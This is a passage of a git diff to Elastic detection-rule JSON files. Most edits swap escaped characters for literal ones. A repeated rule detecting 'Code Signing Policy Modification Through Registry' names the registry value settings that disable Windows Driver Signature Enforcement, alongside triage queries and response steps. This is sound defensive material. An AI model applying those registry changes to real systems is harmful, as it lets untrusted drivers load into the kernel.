+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json
index 4f4d3cdc0d8..e1f9dda38ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json
index 74e35ab2f09..6b4bd43e5d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json
index ff564ab3bbf..99b131388e0 100644
--- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json index bd4da86ead7..943b7b9b1bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json index 51d05d2fee9..e5ed70ac39c 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json index 0ed4b12b4b6..664bd4f07c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
